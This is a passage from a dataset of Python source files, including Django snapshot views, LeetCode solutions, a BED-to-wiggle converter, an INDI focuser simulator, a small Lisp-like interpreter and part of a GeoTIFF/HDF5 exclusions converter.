django.shortcuts import render\n\nfrom projects.api.views.files import ProjectsFilesViewSet\nfrom projects.api.views.snapshots import ProjectsSnapshotsViewSet\n\n\ndef list(request: HttpRequest, *args, **kwargs) -> HttpResponse:\n \"\"\"\n List snapshots for a project.\n \"\"\"\n viewset = ProjectsSnapshotsViewSet.init(\"list\", request, args, kwargs)\n project = viewset.get_project()\n snapshots = viewset.get_queryset(project)\n\n return render(\n request,\n \"projects/snapshots/list.html\",\n dict(project=project, snapshots=snapshots, meta=project.get_meta()),\n )\n\n\ndef retrieve(\n request: HttpRequest, *args, template=\"projects/snapshots/retrieve.html\", **kwargs\n) -> HttpResponse:\n \"\"\"\n Retrieve a snapshot of a project.\n \"\"\"\n snapshot_viewset = ProjectsSnapshotsViewSet.init(\"retrieve\", request, args, kwargs)\n project = snapshot_viewset.get_project()\n snapshot = snapshot_viewset.get_object(project=project)\n snapshot_context = snapshot_viewset.get_response_context(instance=snapshot)\n\n files_viewset = ProjectsFilesViewSet.init(\"list\", request, args, kwargs)\n files = files_viewset.get_queryset(project=project, snapshot=snapshot)\n files_context = files_viewset.get_response_context(queryset=files)\n\n return render(\n request,\n template,\n dict(**snapshot_context, **files_context, meta=project.get_meta()),\n )\n","sub_path":"manager/projects/ui/views/snapshots.py","file_name":"snapshots.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"201415025","text":"class Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n product = 0\n left = [1 for i in nums]\n output = [1 for i in nums]\n for i in range(1,len(nums)):\n left[i] = left[i-1]* nums[i-1] \n R = 1\n for i in range(len(nums)-1,-1,-1):\n output[i] = left[i]*R\n R = R*nums[i]\n return output\n","sub_path":"ProductOfArrayExceptSelf.py","file_name":"ProductOfArrayExceptSelf.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"216512807","text":"#self.myPow重复调了两次,一次就够了\n\nclass Solution:\n def myPow(self, x: float, n: int) -> float:\n if n == 1:\n return x\n if n == 0:\n return 1\n t = abs(n)\n res = self.myPow(x*x, int(t/2))\n if t%2:\n res = res * x\n if n < 0:\n return 1/res\n return res\n","sub_path":"Math 50. Pow(x, n).py","file_name":"Math 50. Pow(x, n).py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"203644419","text":"class BED:\r\n\t\r\n\tdef _init_(self):\r\n\t\tpass\r\n\r\n\tdef Readfile(self, filename):\r\n\t\thandle = open(filename,'r')\r\n\t\tmatrix_of_bed_file = []\r\n\t\tfor line in handle:\r\n\t\t\ttemp = line.strip().split('\\t')\r\n\t\t\ttemp2 = list(temp)\r\n\t\t\tmatrix_of_bed_file.append(temp2)\r\n\t\treturn matrix_of_bed_file\r\n\t\r\n\tdef ConvertBEDtoWiggle(self, BED):\r\n\t\ttotal = 0\r\n\t\twiggle_header = 'track type=wiggle_0\\nfixedStep chrom='\r\n\t\twiggle_matrix = []\r\n\t\tprevious_chromosome_name = 'null'\r\n\t\tfor line in BED:\r\n\t\t\tif(line[0] != previous_chromosome_name):\r\n\t\t\t\twiggle_matrix.append(wiggle_header+line[0]+'\\n')\r\n\t\t\t\tprevious_chromosome_name = line[0]\r\n\t\t\tstart = int(line[1])\r\n\t\t\tend = int(line[2])\r\n\t\t\tfor i in range(start,end):\r\n\t\t\t\twiggle_matrix.append(line[3])\r\n\t\t\t\ttotal += float(line[3])\r\n\t\treturn wiggle_matrix, round(total)","sub_path":"class_bed.py","file_name":"class_bed.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"639360117","text":"import threading\nimport time\n\nfrom indi.device import Driver\nfrom indi.device.pool import DevicePool\nfrom indi.device import properties\nfrom indi.message import const\n\n\n@DevicePool.register\nclass Focuser(Driver):\n name = 'FOCUSER_SIMULATOR'\n\n general = properties.Group(\n 'GENERAL',\n vectors=dict(\n connection=properties.Standard('CONNECTION', onchange='connect'),\n info=properties.TextVector(\n 'INFO',\n enabled=False,\n perm=const.Permissions.READ_ONLY,\n elements=dict(\n manufacturer=properties.Text('MANUFACTURER', default='Wiktor Latanowicz'),\n camera_model=properties.Text('FOCUSER_MODEL', default='FocuserSimulator'),\n )\n ),\n active_device=properties.Standard(\n 'ACTIVE_DEVICES',\n elements=dict(\n camera=properties.Text('ACTIVE_FOCUSER', default=name)\n )\n )\n )\n )\n\n position = properties.Group(\n 'POSITION',\n enabled=False,\n vectors=dict(\n position=properties.Standard('ABS_FOCUS_POSITION'),\n )\n )\n\n position.position.position.onwrite = 'reposition'\n\n def connect(self, sender):\n connected = self.general.connection.connect.bool_value\n self.position.enabled = connected\n self.general.info.enabled = connected\n\n def reposition(self, sender, value):\n def worker():\n step_size = 85\n delay = 1\n\n self.position.position.state_ = const.State.BUSY\n diff = float(value) - sender.value\n while abs(diff) > 0.1:\n dir = 1 if diff > 0 else -1\n step = dir * min(step_size, abs(diff))\n time.sleep(delay)\n sender.value = sender.value + step\n diff = float(value) - sender.value\n self.position.position.state_ = const.State.OK\n\n w = threading.Thread(target=worker, daemon=True)\n w.start()\n","sub_path":"telescopy_sims/devices/Focuser.py","file_name":"Focuser.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"473596417","text":"import collections\nimport functools\nimport argparse\nimport operator as op\nimport math\nimport time\nimport os\nimport re\n\n\nToken = collections.namedtuple('Token', ['typ', 'value', 'line', 'column'])\nkeywords = [\n \"function\", \"if\", \"while\"\n]\n\n\nclass ParseError(Exception):\n pass\n\n\nclass Procedure(object):\n def __init__(self, params, body, envi):\n self.params, self.body, self.env = params, body, envi\n self.params = [p.value for p in self.params]\n\n def __call__(self, *args):\n return evaluate(self.body, Env(self.params, args, outer=self.env))\n\n\nclass Env(dict):\n def __init__(self, parms=(), args=(), outer=None):\n super().__init__(self)\n self.update(zip(parms, args))\n self.outer = outer\n\n def __xor__(self, other):\n new = Env()\n for key in other:\n if key not in self:\n new[key] = other[key]\n return new\n\n def __and__(self, other):\n new = Env()\n for key in other:\n if key in self and key in other:\n new[key] = self[key]\n return new\n\n def __getitem__(self, var):\n return dict.__getitem__(self, var) if var in self else None\n\n def find(self, var):\n if var in self:\n return self[var]\n elif self.outer is not None:\n return self.outer.find(var)\n else:\n return None\n\n\ndef print_r(array, i=0):\n for elem in array:\n if not isinstance(elem, list):\n print(\"\\t\" * i + str(elem))\n else:\n print_r(elem, i + 1)\n\n\ndef require(cond, error):\n if not cond:\n raise error\n\n\ndef atom(tok):\n if tok.value == 'true':\n value = True\n elif tok.value == 'false':\n value = False\n try:\n value = int(tok.value)\n except ValueError:\n try:\n value = float(tok.value)\n except ValueError:\n try:\n value = complex(tok.value.replace('i', 'j', 1))\n except ValueError:\n value = str(tok.value)\n return Token(tok.typ, value, tok.line, tok.column)\n\n\ndef mtoa(*tokens):\n work = \"\"\n for tok in tokens:\n if work:\n work += \" \"\n if tok == True and isinstance(tok, bool):\n work += 'true'\n elif tok == False and isinstance(tok, bool):\n work += 'true'\n elif isinstance(tok, list):\n work += '(' + ' '.join(map(mtoa, tok)) + ')'\n elif isinstance(tok, complex):\n work += tok.replace('j', 'i')\n else:\n work += str(tok)\n return work\n\n\ndef standard_env():\n _env = Env()\n _env.update(vars(math))\n _env.update({\n # maths\n '+': op.add, '-': op.sub,\n '*': op.mul, '/': op.truediv,\n '//': op.floordiv, '%': op.mod,\n '**': lambda a, b: a ** b,\n\n # binaires\n '^': op.xor, '|': op.or_,\n '~': lambda a: ~a, '&': op.and_,\n 'rshift': lambda a, b: a >> b, 'lshift': lambda a, b: a << b,\n\n # Conditions\n '>': op.gt, '<': op.lt, '>=': op.ge,\n '<=': op.le, '!=': op.ne, '==': op.eq,\n '!': lambda a: not a,\n\n # listes\n '@': op.getitem, '@=': op.setitem, '@~': op.delitem, 'length': len,\n 'list': lambda *x: list(x), 'list?': lambda x: isinstance(x, list),\n '@@': lambda *x: x[1:],\n 'cons': lambda x, y: [x] + y if not isinstance(x, list) and isinstance(y, list) else x + [y],\n\n # autres\n 'time': time.time, 'round': round, 'abs': abs, 'zip': lambda *x: list(zip(*x)),\n 'map': lambda *x: list(map(*x)), 'max': max, 'min': min, \"print\": lambda *x: print(mtoa(*x)),\n\n # fichiers\n 'open-input-file': open, 'open-output-file': lambda f: open(f, 'w'), 'close-file': lambda f: f.close(),\n 'read-file': lambda f: f.read(), 'write-in-file': lambda f, s: f.write(s),\n\n # types\n 'int': lambda x: int(x), 'float': lambda x: float(x), 'number?': lambda x: isinstance(x, (int, float)),\n 'bool': lambda x: bool(x), 'bool?': lambda x: isinstance(x, bool),\n 'str': lambda x: str(x), 'str?': lambda x: isinstance(x, str),\n })\n return _env\n\n\ndef tokenize(code):\n token_specification = [\n ('PARAMETER', r':[A-Za-z_][A-Za-z0-9_\\?\\-]*'), # function parameter\n ('NUMBER', r'\\d+(\\.\\d*)?'), # Integer or decimal number\n ('STRING', r'[\\'\"]{1}.*[\\'\"]{1}'), # String\n ('ASSIGN', r'='), # Assignment operator\n ('CALL', r'<<'),\n ('BLOC_START', r'\\('), ('BLOC_END', r'\\)'), # Blocs\n # ('SEPARATOR', r','), # Argument separator\n # ('END', r';'), # Statement terminator\n ('ARRAY_START', r'\\['), ('ARRAY_END', r'\\]'), # Array\n ('COMMENT', r'#.*'), # Comment\n ('ID', r'[A-Za-z_][A-Za-z0-9_\\?\\-]*'), # Identifiers\n ('BOOL', r'(true|false)'), # Boolean\n ('OP', r'(\\+|-|\\*|/|%|\\*\\*|@|@=|@~)'), # Arithmetic operators\n ('BINARYOP', r'(\\&|\\^|\\|rshift|lshift)'), # Binary operators\n ('COND', r'(<|>|==|<=|>=|!=|!)'), # Conditionnals operators\n ('NEWLINE', r'(\\n|\\r|\\r\\n)'), # Line endings\n ('SKIP', r'[ \\t]+'), # Skip over spaces and tabs\n ('MISMATCH', r'.'), # Any other character\n ]\n tok_regex = '|'.join('(?P<%s>%s)' % pair for pair in token_specification)\n line_num = 1\n line_start = 0\n\n for mo in re.finditer(tok_regex, code):\n kind = mo.lastgroup\n value = mo.group(kind)\n\n if kind == 'MISMATCH':\n raise RuntimeError('%r unexpected on line %d' % (value, line_num))\n elif kind == 'NEWLINE':\n line_start = mo.end()\n line_num += 1\n elif kind == 'SKIP' or kind == 'COMMENT':\n pass\n else:\n if kind == 'ID' and value in keywords:\n kind = 'kwtype'\n if kind == 'STRING':\n value = value[1:-1]\n if kind == 'NUMBER':\n try:\n value = int(value)\n except ValueError:\n value = float(value)\n\n column = mo.start() - line_start\n yield Token(kind, value, line_num, column)\n\n\ndef parse(context, tokens):\n token = tokens.pop(0) # on enlève le premier token qui doit etre un '('\n require(token.typ != 'BLOC_END',\n SyntaxError(\"Unexpected '%s', line: %i, column: %i (instead of '(')\\n%s\" % (token.value, token.line, token.column, context[token.line - 1])))\n\n if token.typ == 'ARRAY_START':\n array = []\n while tokens[0].typ != 'ARRAY_END':\n val = parse(context, tokens)\n if val is not None:\n array.append(val)\n tok_array = Token('ARRAY', [t.value for t in array], token.line, token.column)\n last = tokens.pop(0) # on enlève le dernier token qui doit être un ']'\n line = \"%s\\n\" % context[last.line - 1]\n line += \" \" * last.column + \"^\" * len(last.value) + \"\\n\"\n require(last.typ == 'ARRAY_END',\n SyntaxError(\"Expected ']'\\n\" + line))\n return tok_array\n elif token.typ == 'BLOC_START':\n ast = []\n while tokens[0].typ != 'BLOC_END':\n val = parse(context, tokens)\n if val is not None:\n ast.append(val)\n last = tokens.pop(0) # on enlève le dernier token qui doit être un ')'\n line = \"%s\\n\" % context[last.line - 1]\n line += \" \" * last.column + \"^\" * len(last.value) + \"\\n\"\n require(last.typ == 'BLOC_END',\n SyntaxError(\"Expected ')'\\n\" + line))\n return ast\n else:\n return atom(token)\n\n\ndef evaluate(parsed_line, env):\n if parsed_line[0].typ == 'PARAMETER':\n return env.find(parsed_line[0].value)\n if parsed_line[0].typ == 'ID':\n if len(parsed_line) > 1:\n if parsed_line[1].typ == 'ASSIGN':\n env[parsed_line[0].value] = evaluate(parsed_line[2:], env)\n return None\n if parsed_line[1].typ == 'CALL':\n require(parsed_line[0].value in env,\n RuntimeError(\"'%s' does not exist, line: %i\" % (parsed_line[0].value, parsed_line[0].line)))\n exprs = [evaluate([bloc], env) for bloc in parsed_line[2:]]\n return env.find(parsed_line[0].value)(*exprs)\n return env.find(parsed_line[0].value)\n if len(parsed_line) > 1 and isinstance(parsed_line[1], Token) and parsed_line[1].typ in ('OP', 'BINARYOP', 'COND'):\n require(len(parsed_line) >= 3,\n ValueError(\"Missing arguments for %s, line: %i\" % (parsed_line[1].value, parsed_line[1].line)))\n operandes = [evaluate([e], env) for e in [parsed_line[0]] + parsed_line[2:]]\n print(operandes)\n return functools.reduce(env.find(parsed_line[1].value), operandes)\n if parsed_line[0].typ == 'kwtype':\n if parsed_line[0].value == 'function':\n for supposed_arg in parsed_line[1:-1]:\n require(supposed_arg.typ == 'PARAMETER',\n SyntaxError(\"'%s' should be a parameter, not '%s'. Line: %i\" % (supposed_arg.value, supposed_arg.typ, supposed_arg.line)))\n return Procedure(parsed_line[1:-1], parsed_line[-1], env)\n if parsed_line[0].value == 'if':\n require(len(parsed_line) >= 3,\n SyntaxError(\"Missing a part of the expression. Line: %i\" % parsed_line[0].line))\n cond = evaluate(parsed_line[1], env)\n if cond:\n return evaluate(parsed_line[2], env)\n else:\n if len(parsed_line == 4):\n return evaluate(parsed_line[3], env)\n return None\n if parsed_line[0].value == 'while':\n require(len(parsed_line) >= 3,\n SyntaxError(\"Missing a part of the expression. Line: %i\" % parsed_line[0].line))\n while evaluate(parsed_line[1], env):\n for expr in parsed_line[2:]:\n evaluate(expr, env)\n return None\n if parsed_line[0].typ in ('NUMBER', 'STRING', 'BOOL', 'ARRAY'):\n return parsed_line[0].value\n return None\n\n\narg_parser = argparse.ArgumentParser(\n\tprog='seventh.py',\n\tdescription=\"Tokenize, parse, and execute the given input file\"\n)\narg_parser.add_argument('path', metavar='PATH', help='the input file')\narg_parser.add_argument('-l', '--lex', dest='lex', action='store_true',\n \t\thelp='tokenize the given input file')\narg_parser.add_argument('-a', '--ast', dest='ast', action='store_true',\n \t\thelp='parse the given input file')\narg_parser.add_argument('-e', '--execute', dest='exe', action='store_true',\n help='execute the given input file')\narg_parser.add_argument('-c', '--compile', dest='comp', action='store_true',\n help='compile the given input file into Python AST')\narg_parser.add_argument('-i', '--interpreter', dest='repl', action='store_true',\n help='start an interpreter')\n\n\ndef main(path=\"\", lex=False, ast=False, exe=False, comp=False, repl=False):\n path = os.path.abspath(path)\n\n try:\n with open(path, \"r\", encoding=\"utf-8\") as file:\n content = file.readlines()\n except Exception as exc:\n if not repl:\n raise RuntimeError(\"Unable to find '%s'\" % path) from exc\n\n if ast or comp:\n lex = True\n if exe:\n lex = True\n ast = True\n\n tokens = None\n parsed = None\n\n if lex:\n tokens = [[tok for tok in tokenize(line)] for line in content]\n if not ast and not comp: print_r(tokens)\n if comp:\n raise NotImplementedError(\"Unable to compile, functionality is not implemented for the moment\")\n if ast:\n parsed = [p for p in [parse(content, toks) for toks in tokens if toks is not None and toks != []] if p is not None and p != []]\n if not exe: print_r(parsed)\n if repl:\n env = standard_env()\n while True:\n code = input('> ')\n try:\n val = evaluate(code, env)\n if val:\n print(mtoa(val))\n except Exception as exc:\n print(exc)\n if exe:\n env = standard_env()\n for line in parsed:\n val = evaluate(line, env)\n if val:\n print(mtoa(val))\n\n\nif __name__ == '__main__':\n args = arg_parser.parse_args()\n main(**args.__dict__)\n","sub_path":"seventh.py","file_name":"seventh.py","file_ext":"py","file_size_in_byte":12419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"315207381","text":"# -*- coding: utf-8 -*-\n\"\"\"\nHandler to convert exclusion to/from .h5 and .geotiff\n\"\"\"\nimport h5py\nimport json\nimport logging\nimport numpy as np\nimport os\nfrom pyproj.crs import CRS\nimport rasterio\nfrom warnings import warn\n\nfrom reV.handlers.exclusions import ExclusionLayers\nfrom reV.handlers.outputs import Outputs\n\nfrom reVX.handlers.geotiff import Geotiff\nfrom reVX.utilities.exceptions import ExclusionsCheckError\nfrom reVX.utilities.utilities import log_versions\n\nlogger = logging.getLogger(__name__)\n\n\nclass ExclusionsConverter:\n \"\"\"\n Convert exclusion layers between .h5 and .tif (geotiff)\n \"\"\"\n def __init__(self, excl_h5, hsds=False, chunks=(128, 128), replace=True):\n \"\"\"\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing or to contain exclusion layers\n hsds : bool, optional\n Boolean flag to use h5pyd to handle .h5 'files' hosted on AWS\n behind HSDS, by default False\n chunks : tuple, optional\n Chunk size of exclusions in .h5 and Geotiffs, by default (128, 128)\n replace : bool, optional\n Flag to replace existing layers if needed, by default True\n \"\"\"\n log_versions(logger)\n self._excl_h5 = excl_h5\n self._hsds = hsds\n self._chunks = chunks\n self._replace = replace\n\n def __repr__(self):\n msg = \"{} for {}\".format(self.__class__.__name__, self._excl_h5)\n return msg\n\n def __getitem__(self, layer):\n \"\"\"\n Parameters\n ----------\n layer : str\n Layer to extract data for\n\n Returns\n -------\n profile : dict\n Geotiff profile (attributes)\n values : ndarray\n Geotiff data\n \"\"\"\n\n if layer not in self.layers:\n msg = \"{} is not present in {}\".format(layer, self._excl_h5)\n logger.error(msg)\n raise KeyError(msg)\n\n profile, values = self._extract_layer(self._excl_h5, layer,\n hsds=self._hsds)\n return profile, values\n\n def __setitem__(self, layer, geotiff):\n \"\"\"\n Parameters\n ----------\n layer : str\n Layer to set\n geotiff : str\n Path to GeoTiff to load data from\n \"\"\"\n self.geotiff_to_layer(layer, geotiff)\n\n @property\n def layers(self):\n \"\"\"\n Available exclusion layers in .h5 file\n\n Returns\n -------\n layers : list\n Available layers in .h5 file\n \"\"\"\n with ExclusionLayers(self._excl_h5, hsds=self._hsds) as exc:\n layers = exc.layers\n\n return layers\n\n @staticmethod\n def _init_h5(excl_h5, geotiff, chunks=(128, 128)):\n \"\"\"\n Initialize exclusions .h5 file from geotiff:\n - Transfer profile, shape, and meta\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing exclusion layers\n geotiff : str\n Path to geotiff file\n chunks : tuple\n Chunk size of exclusions in Geotiff\n \"\"\"\n logger.debug('\\t- Initializing {} from {}'\n .format(excl_h5, geotiff))\n with Geotiff(geotiff, chunks=chunks) as src:\n profile = src.profile\n shape = src.shape\n lat, lon = src.lat_lon\n logger.debug('\\t- \"profile\", \"meta\", and \"shape\" extracted from {}'\n .format(geotiff))\n\n try:\n with h5py.File(excl_h5, mode='w') as dst:\n dst.attrs['profile'] = json.dumps(profile)\n logger.debug('\\t- Default profile:\\n{}'.format(profile))\n dst.attrs['shape'] = shape\n logger.debug('\\t- Default shape:\\n{}'.format(shape))\n dst.attrs['chunks'] = chunks\n logger.debug('\\t- Default chunks:\\n{}'.format(chunks))\n\n dst.create_dataset('latitude', shape=lat.shape,\n dtype=np.float32, data=lat,\n chunks=chunks)\n logger.debug('\\t- latitude coordiantes created')\n\n dst.create_dataset('longitude', shape=lon.shape,\n dtype=np.float32, data=lon,\n chunks=chunks)\n logger.debug('\\t- longitude coordiantes created')\n except Exception:\n logger.exception(\"Error initilizing {}\".format(excl_h5))\n if os.path.exists(excl_h5):\n os.remove(excl_h5)\n\n @staticmethod\n def _check_crs(baseline_crs, test_crs, ignore_keys=('no_defs',)):\n \"\"\"\n Compare baseline and test crs values\n\n Parameters\n ----------\n baseline_crs : dict\n Baseline CRS to use a truth, must be a dict\n test_crs : dict\n Test CRS to compare with baseline, must be a dictionary\n ignore_keys : tuple\n Keys to not check\n\n Returns\n -------\n bad_crs : bool\n Flag if crs' do not match\n \"\"\"\n bad_crs = False\n for k, true_v in baseline_crs.items():\n if k not in ignore_keys:\n test_v = test_crs.get(k, true_v)\n if true_v != test_v:\n bad_crs = True\n\n return bad_crs\n\n @classmethod\n def _check_geotiff(cls, excl_h5, geotiff, chunks=(128, 128),\n transform_atol=0.01, coord_atol=0.001):\n \"\"\"\n Compare geotiff with exclusion layer, raise any errors\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing exclusion layers\n geotiff : str\n Path to geotiff file\n chunks : tuple\n Chunk size of exclusions in Geotiff\n transform_atol : float\n Absolute tolerance parameter when comparing geotiff transform data.\n coord_atol : float\n Absolute tolerance parameter when comparing new un-projected\n geotiff coordinates against previous coordinates.\n \"\"\"\n with Geotiff(geotiff, chunks=chunks) as tif:\n with ExclusionLayers(excl_h5) as h5:\n if tif.bands > 1:\n error = ('{} contains more than one band!'\n .format(geotiff))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n if not np.array_equal(h5.shape, tif.shape):\n error = ('Shape of exclusion data in {} and {} do not '\n 'match!'.format(geotiff, excl_h5))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n profile = h5.profile\n h5_crs = CRS.from_string(profile['crs']).to_dict()\n tif_crs = CRS.from_string(tif.profile['crs']).to_dict()\n bad_crs = cls._check_crs(h5_crs, tif_crs)\n if bad_crs:\n error = ('Geospatial \"crs\" in {} and {} do not match!'\n '\\n {} !=\\n {}'\n .format(geotiff, excl_h5, tif_crs, h5_crs))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n if not np.allclose(profile['transform'],\n tif.profile['transform'],\n atol=transform_atol):\n error = ('Geospatial \"transform\" in {} and {} do not '\n 'match!\\n {} !=\\n {}'\n .format(geotiff, excl_h5, profile['transform'],\n tif.profile['transform']))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n lat, lon = tif.lat_lon\n if not np.allclose(h5.latitude, lat, atol=coord_atol):\n error = ('Latitude coordinates {} and {} do not match to '\n 'within {} degrees!'\n .format(geotiff, excl_h5, coord_atol))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n if not np.allclose(h5.longitude, lon, atol=coord_atol):\n error = ('Longitude coordinates {} and {} do not match to '\n 'within {} degrees!'\n .format(geotiff, excl_h5, coord_atol))\n logger.error(error)\n raise ExclusionsCheckError(error)\n\n @classmethod\n def _parse_tiff(cls, geotiff, excl_h5=None, chunks=(128, 128),\n check_tiff=True, transform_atol=0.01, coord_atol=0.001):\n \"\"\"\n Extract exclusion layer from given geotiff, compare with excl_h5\n if provided\n\n Parameters\n ----------\n geotiff : str\n Path to geotiff file\n excl_h5 : str, optional\n Path to .h5 file containing exclusion layers, by default None\n chunks : tuple, optional\n Chunk size of exclusions in Geotiff, by default (128, 128)\n check_tiff : bool, optional\n Flag to check tiff profile and coordinates against exclusion .h5\n profile and coordinates, by default True\n transform_atol : float, optional\n Absolute tolerance parameter when comparing geotiff transform data,\n by default 0.01\n coord_atol : float, optional\n Absolute tolerance parameter when comparing new un-projected\n geotiff coordinates against previous coordinates, by default 0.001\n\n Returns\n -------\n profile : dict\n Geotiff profile (attributes)\n values : ndarray\n Geotiff data\n \"\"\"\n if excl_h5 is not None and check_tiff:\n cls._check_geotiff(excl_h5, geotiff, chunks=chunks,\n transform_atol=transform_atol,\n coord_atol=coord_atol)\n\n with Geotiff(geotiff, chunks=chunks) as tif:\n profile, values = tif.profile, tif.values\n\n return profile, values\n\n @staticmethod\n def _write_layer(excl_h5, layer, profile, values, chunks=(128, 128),\n description=None, scale_factor=None):\n \"\"\"\n Write exclusion layer to .h5 file\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing exclusion layers\n layer : str\n Dataset name in .h5 file\n profile : dict\n Geotiff profile (attributes)\n values : ndarray\n Geotiff data\n chunks : tuple\n Chunk size of dataset in .h5 file\n description : str\n Description of exclusion layer\n scale_factor : int | float, optional\n Scale factor to use to scale geotiff data when added to the .h5\n file, by default None\n \"\"\"\n if len(chunks) < 3:\n chunks = (1, ) + chunks\n\n if values.ndim < 3:\n values = np.expand_dims(values, 0)\n\n with h5py.File(excl_h5, mode='a') as f:\n if layer in f:\n ds = f[layer]\n ds[...] = values\n logger.debug('\\t- {} values replaced'.format(layer))\n else:\n ds = f.create_dataset(layer, shape=values.shape,\n dtype=values.dtype, chunks=chunks,\n data=values)\n logger.debug('\\t- {} created and loaded'.format(layer))\n\n ds.attrs['profile'] = json.dumps(profile)\n logger.debug('\\t- Unique profile for {} added:\\n{}'\n .format(layer, profile))\n if description is not None:\n ds.attrs['description'] = description\n logger.debug('\\t- Description for {} added:\\n{}'\n .format(layer, description))\n\n if scale_factor is not None:\n ds.attrs['scale_factor'] = scale_factor\n logger.debug('\\t- scale_factor for {} added:\\n{}'\n .format(layer, scale_factor))\n\n @classmethod\n def _geotiff_to_h5(cls, excl_h5, layer, geotiff, chunks=(128, 128),\n check_tiff=True, transform_atol=0.01, coord_atol=0.001,\n description=None, scale_factor=None, dtype='int16'):\n \"\"\"\n Transfer geotiff exclusions to h5 confirming they match existing layers\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing exclusion layers\n layer : str\n Layer to extract\n geotiff : str\n Path to geotiff file\n chunks : tuple, optional\n Chunk size of exclusions in Geotiff, by default (128, 128)\n check_tiff : bool, optional\n Flag to check tiff profile and coordinates against exclusion .h5\n profile and coordinates, by default True\n transform_atol : float, optional\n Absolute tolerance parameter when comparing geotiff transform data,\n by default 0.01\n coord_atol : float, optional\n Absolute tolerance parameter when comparing new un-projected\n geotiff coordinates against previous coordinates, by default 0.001\n description : str, optional\n Description of exclusion layer, by default None\n scale_factor : int | float, optional\n Scale factor to use to scale geotiff data when added to the .h5\n file, by default None\n dtype : str, optional\n Dtype to save geotiff data as in the .h5 file. Only used when\n 'scale_factor' is not None, by default 'int16'\n \"\"\"\n logger.debug('\\t- {} being extracted from {} and added to {}'\n .format(layer, geotiff, os.path.basename(excl_h5)))\n\n profile, values = cls._parse_tiff(\n geotiff, excl_h5=excl_h5, chunks=chunks, check_tiff=check_tiff,\n transform_atol=transform_atol, coord_atol=coord_atol)\n\n if scale_factor is not None:\n attrs = {'scale_factor': scale_factor}\n values = Outputs._check_data_dtype(values, dtype, attrs=attrs)\n\n cls._write_layer(excl_h5, layer, profile, values,\n chunks=chunks, description=description,\n scale_factor=scale_factor)\n\n @staticmethod\n def _write_geotiff(geotiff, profile, values):\n \"\"\"\n Write values to geotiff with given profile\n\n Parameters\n ----------\n geotiff : str\n Path to geotiff file to save data to\n profile : dict\n Geotiff profile (attributes)\n values : ndarray\n Geotiff data\n \"\"\"\n out_dir = os.path.dirname(geotiff)\n if not os.path.exists(out_dir):\n logger.debug(\"Creating {}\".format(out_dir))\n os.makedirs(out_dir)\n\n if values.shape[0] != 1:\n values = np.expand_dims(values, 0)\n\n dtype = values.dtype.name\n profile['dtype'] = dtype\n if np.issubdtype(dtype, np.integer):\n dtype_max = np.iinfo(dtype).max\n else:\n dtype_max = np.finfo(dtype).max\n\n profile['nodata'] = dtype_max\n\n with rasterio.open(geotiff, 'w', **profile) as f:\n f.write(values)\n logger.debug('\\t- {} created'.format(geotiff))\n\n @classmethod\n def _extract_layer(cls, excl_h5, layer, geotiff=None, hsds=False):\n \"\"\"\n Extract given layer from exclusions .h5 file and write to geotiff .tif\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing exclusion layers\n layer : str\n Layer to extract\n geotiff : str\n Path to geotiff file\n hsds : bool\n Boolean flag to use h5pyd to handle .h5 'files' hosted on AWS\n behind HSDS\n\n Returns\n -------\n profile : dict\n Geotiff profile (attributes)\n values : ndarray\n Geotiff data\n \"\"\"\n logger.debug('\\t - Extracting {} from {}'\n .format(layer, os.path.basename(excl_h5)))\n with ExclusionLayers(excl_h5, hsds=hsds) as f:\n profile = f.get_layer_profile(layer)\n values = f.get_layer_values(layer)\n\n if geotiff is not None:\n logger.debug('\\t- Writing {} to {}'.format(layer, geotiff))\n cls._write_geotiff(geotiff, profile, values)\n\n return profile, values\n\n def geotiff_to_layer(self, layer, geotiff, check_tiff=True,\n transform_atol=0.01, coord_atol=0.001,\n description=None, scale_factor=None, dtype='int16'):\n \"\"\"\n Transfer geotiff exclusions to h5 confirming they match existing layers\n\n Parameters\n ----------\n layer : str\n Layer to extract\n geotiff : str\n Path to geotiff file\n check_tiff : bool, optional\n Flag to check tiff profile and coordinates against exclusion .h5\n profile and coordinates, by default True\n transform_atol : float, optional\n Absolute tolerance parameter when comparing geotiff transform data,\n by default 0.01\n coord_atol : float, optional\n Absolute tolerance parameter when comparing new un-projected\n geotiff coordinates against previous coordinates, by default 0.001\n description : str, optional\n Description of exclusion layer, by default None\n scale_factor : int | float, optional\n Scale factor to use to scale geotiff data when added to the .h5\n file, by default None\n dtype : str, optional\n Dtype to save geotiff data as in the .h5 file. Only used when\n 'scale_factor' is not None, by default 'int16'\n \"\"\"\n if not os.path.exists(self._excl_h5):\n self._init_h5(self._excl_h5, geotiff, chunks=self._chunks)\n\n if layer in self.layers:\n msg = (\"{} is already present in {}\"\n .format(layer, self._excl_h5))\n if self._replace:\n msg += \" and will be replaced\"\n logger.warning(msg)\n warn(msg)\n else:\n msg += \", to 'replace' set to True\"\n logger.error(msg)\n raise KeyError(msg)\n\n self._geotiff_to_h5(self._excl_h5, layer, geotiff,\n chunks=self._chunks,\n check_tiff=check_tiff,\n transform_atol=transform_atol,\n coord_atol=coord_atol,\n description=description,\n scale_factor=scale_factor,\n dtype=dtype)\n\n def layer_to_geotiff(self, layer, geotiff):\n \"\"\"\n Extract desired layer from .h5 file and write to geotiff .tif\n\n 